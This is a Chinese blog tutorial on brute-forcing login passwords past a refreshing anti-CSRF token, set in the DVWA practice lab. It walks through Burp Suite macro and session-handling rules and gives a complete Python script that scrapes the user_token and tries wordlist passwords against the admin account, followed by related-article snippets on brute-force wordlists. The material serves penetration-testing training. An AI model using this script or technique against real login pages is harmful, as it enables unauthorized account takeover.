burp密码爆破字典_如何在渗透测试中爆破刷新token的请求

最新推荐文章于 2024-07-27 11:02:27 发布
最新推荐文章于 2024-07-27 11:02:27 发布
阅读量705 收藏 2
点赞数
文章标签: burp密码爆破字典

0x00 前言

    一些web网站为了增强自己的安全性,会在请求中添加token,每一次请求服务端校验token是否正确,同时返回新的token给客户端。本文以dvwa为例,介绍遇到以上情况时如何应对

0x01 利用Burp模块解决

我们搭建dwva为例,分析dvwa的登录过程,发现了user_token参数阻止了我们常规的口令爆破。

68ab5a483c2a34d8603a976e301179c9.png

1a0d1add1f41b06d4872bd2fd9fb8ab1.png

此处,我们的目标是让burpsuite自动获取并更新该参数

首先,点击burp的project options- sessions模块,找到macros宏录制功能,add添加一个宏

a061d7181cd59bb46598aaf431c29344.png

选择一条响应包中包含user_token参数的url,点击ok

6405692494cf6842fa424520cfce0251.png

点击configure item,再点击add

e33a1f4cc0310750829aeced900a103f.png双击选中user_token的值,然后点击ok

f7a6619cbdf7fcd1af1bbb11c3fb6e11.png

ok保存完成后,到此,我们就成功录制了一个宏

8e45761685d2ff310d585e9fb4e78a76.png

接下来找到session handlingrules,add添加一条规则

fc51b3a7a689d8c69688b18f36b9baea.png点击run a macro

6c2c7ee601f92c8b6a25def1f2d7396c.png

选择刚刚录制的宏,然后点击update only the following parameters,参数名填user_token(爆破过程中需要更新的参数)

6ca05c2c3e37006cf0b290161d882115.png

添加并保存后,找到scope选项设置生效的范围,由于这里只演示爆破操作,所以范围选择intruder,url选择包含所有url

ece6cd729ee0e8492633260ec4eb1de6.png

设置完毕后就可以愉快的爆破了,可以看到每一次请求user_token会自动更新。需要注意的是由于服务端更新token存在一个时间间隔,所以建议爆破时将线程调低一点

a23a3ae78f48587ca438f43c813996a1.png

eeea3bf81cf5f3e1e7ab6389f64019d6.png

验证下,筛选结果,当密码正确时,响应包中有index.php关键字,进一步得出dvwa的密码是password

c90dc044769bf077281f54a43155e032.png

0x02 利用Python脚本解决

以上是使用burpsuite处理token的方法,当然也可以写个脚本完成获取token并爆破的过程,下面给出Python代码供读者参考

1.  import re  2.  import sys  3.  import requests  4.    5.  # 获取user_token参数值  6.  def get_token(url):  7.      global conn  8.      conn = requests.session()  9.      req = conn.get(url=url,verify=False)  10.      pat = "name='user_token' value='(.*?)'"  11.      user_token = re.compile(pat).findall(req.text)[0]  12.      return user_token  13.    14.  def brute_login(url,token,passwd):  15.      # 爆破时使用burp代理  16.      proxies = {  17.          "http": "http://127.0.0.1:8080",  18.          "https": "http://127.0.0.1:8080"  19.      }  20.      payload = {'username': 'admin', 'password': passwd, 'Login': 'Login', 'user_token': token}  21.      req = conn.post(url=url,data=payload,proxies=proxies,verify=False)  22.      # 根据响应包中是否包含Login failed来判断密码是否正确  23.      if "Login failed" not in req.text:  24.          # 爆破完成后打印密码并退出  25.          print("密码是:",passwd)  26.          sys.exit()  27.    28.  def main():  29.      url = "http://127.0.0.1/dvwa/login.php"  30.      # 加载密码字典  31.      f = open('pass.txt')  32.      for line in f.readlines():  33.          user_token = get_token(url)  34.          brute_login(url,user_token,line.strip())  35.      f.close()  36.    37.  if __name__ == '__main__':  38.      main()
weixin_39611047
关注
Burp入门第十篇】使用BurpSuite进行用户名、密码爆破+实战案例
等风来
04-06 2063
123456、123等通常为弱口令,在某些环境下若登录框存在提示(如请输入4位工号),故在登录框可爆破用户名;若不存在提示,可添加用户名字典进行爆破。设置两个payload集,其一添加用户名字典,其二添加密码字典。在已知用户名(如ice)的情况下,可通过添加密码字典进行爆破。3、用户名+密码双重爆破
19-4 burpsuite 爆破
weixin_43263566的博客
01-05 1088
网盘链接:https://pan.baidu.com/s/1v5pAwaTwoeCnJgkUXf3iLQ?pwd=mllm提取码:mllm--来自百度网盘超级会员V2的分享。
burp密码爆破字典_验证码爆破总结及python实现爆破功能
weixin_39711441的博客
11-26 2232
本文作者:Junsec(Ms08067实验室Python渗透小组成员)验证码生成分为两种:1.本地js生产验证码。2.请求url刷新验证码,代码根据这种情况编写。.功能简介:-u 用户名-t 后台地址-p 字典地址-c 验证码地址-k 使用云打码平台识别验证码,默认使用为pytesseract识别验证码用法:python test_captche.py -u admin -t http:...
burp字典_渗透爆破字典的生成
热门推荐
weixin_39623273的博客
11-28 1万+
渗透测试,爆破在我看来都算是实在很无奈的行为了,一般都是实在找不到其他漏洞了才来开始爆破。下面来聊聊比较常见的爆破场景数字ID比较常见的就是网站手机4位或者6位的验证码的爆破。这类爆破都不用专门生成字典burp直接怼就可以了。将下面的参数根据验证码的实际情况来设置就可以2.通用字典爆破后台密码的时候,一般先用top1w,这种通用弱口令字典先去尝试。somd5提供了一些通用...
【网络安全渗透测试零基础入门必知必会】之BurpSuite密码爆破实例演示,零基础入门到精通,收藏这一篇就够了5
最新发布
Libra1313的博客
07-27 811
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段暴力猜解与防御第5篇。本文主要讲解Burpsuite密码破解。
Burp爆破Burp爆破 常用用户名字典
03-22
简单学习使用的Burp爆破 常用 常见 用户名字典
使用Burp Suite对登录页面进行字典攻击
qq_69351815的博客
05-27 2740
Burp Suite是用于攻击web应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。一旦我们获得了目标应用程序的有效用户名列表,我们就可以尝试爆破攻击,它会尝试所有可能的字符组合,直到找到有效的密码。但是大量的字符组合以及客户端和服务器之间的响应时间,暴力攻击在Web应用程序是不可行的。
安全开发--14--Burp生成特定爆破字典插件开发
武天旭的博客
11-08 1538
虽然爆破在理论上是万能的,但我们在爆破的时候,即便我们拥有一个超级无敌的字典,实际上也没有办法或者时间一个个测试。也就是说,爆破的效果取决于字典对于系统的适配性。那我们如何拿到一个适配性好的字典呢?最好的办法就是根据爆破系统的特性找出一些基础单词,然后再将基础单词生成字典,这些基础单词例如系统使用者的姓名、公司名、系统名等等。以上,本文我们将以网页内容为基础数据,生成一个对应的爆破字典
使用burp绕过token爆破
qq_41542761的博客
11-05 5976
使用burp绕过token爆破用户名和密码 首先来说下burp Subit的暴力破解(intruder)的 四种爆破模式: Sniper(狙击手模式):单点爆破模式,跟狙击手一样,每次只会对一个点进行参数爆破,当存在多个参数时,会对每个参数使用用一个字典进行多次爆破,其余参数不变 Battering ram(攻城锤模式):多点爆破模式,会同时对多个参数进行爆破,但是使用的时用一个字典 Pichfo...
渗透测试之pikachu暴力破解(token爆破
LKmnbZ's Blog
11-12 5492
1. token介绍 Token 是在服务端产生的。如果前端使用用户名/密码向服务端请求认证,服务端认证成功,那么在服务端会返回 Token 给前端。前端可以在每次请求的时候带上 Token 证明自己的合法地位。如果这个 Token 在服务端持久化(比如存入数据库),那它就是一个永久的身份令牌。 Token 完全由应用管理,所以它可以避开同源策略 Token 可以避免 C...
渗透测试 ( 8 ) --- Burp Suite Pro 官方文档
墨鱼菜鸡
07-11 1388
Burp Suite 官网 :https://portswigger.net/burp 官方文档:https://portswigger.net/burp/documentation/desktop 完整文档:https://portswigger.net/burp/documentation/contents Burp Suite 实...
爆破字典(简易常用).txt
10-12
字典为使用burp进行穷举爆破时用的简易字典密码不算太多,但是都是常见的,适合新手练习时使用
渗透测试常用的注入类字典burpsuite测试可用)
12-27
渗透测试常用的注入类字典burpsuite测试可用)
cookieupdater:Burp Suite插件,用于有用的cookie更新
05-14
cookie更新器 描述 Burp Suite插件,用于有用的cookie更新。 您可以在两次单击的“ Repeater”选项卡设置实际的cookie值。 如何使用 安装插件后,您只需要在“可编辑打p”选项卡开始使用它即可。 例如,如果您在“转发器”选项卡有包含旧无效Cookie的重要查询,则只需单击“更新Cookie”菜单项,然后按“开始”按钮即可。 如果您在“代理历史记录”使用实际的Cookie进行查询,则可以这样做。 如何编译 由jdk 1.7编译 例子: javac -d构建src / burp / *。java jar cf plugin.jar -C build burp 作者 Shvetsov Alexandr(GitHub: )
后台字典爆破------Burp Suite
Azxbc_的博客
08-10 6450
大家好,很高兴又跟大家见面啦,这次我给大家带来一个非常强大的工具----Burp Suite,此工具可以拦截请求并且可以爆破后台拿到权限,是一个非常强大的工具。这里给大家带来一波爆破后台的技术分享,感谢大家的支持! 一、搭建Burp Suite环境 ·这里要特别注意的地方是外面要配置浏览器代理服务器ip ...
BurpSuite之表单爆破
内心不种满鲜花就会长满杂草
03-21 7557
目录 一. 表单暴力破解 1. 爆破双字段(用户名和密码) 2. 爆破单字段 二. 特殊密码爆破(认证信息) burp的暴力破解模块intruder,支持多种模式的暴力破解,如下 一. 表单暴力破解 1. 爆破双字段(用户名和密码) 1. 如下,输入用户名和密码,截取数据包 2. 发送到intruder,点击Positions,点击clear,选择用户名和密码字段值,点击add,然后攻击类型(attack type)选择Cluster bomb。操作步骤如下 3. 再选择Pay
Burp Suite绕token
qq_45557130的博客
09-21 406
burp suite绕token
网络安全行业需要学历吗?需要考研吗?(1)
2401_84239830的博客
04-27 352
👉👈​。
在安全测试,简述Burpsuite爆破密码的过程
05-05
Burpsuite 是一个用于渗透测试的工具,它可以帮助测试人员发现应用程序的漏洞,其包括密码爆破Burpsuite 爆破密码的过程大致如下: 1. 打开 Burpsuite,将浏览器代理设置为 Burpsuite 代理。 2. 打开要测试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值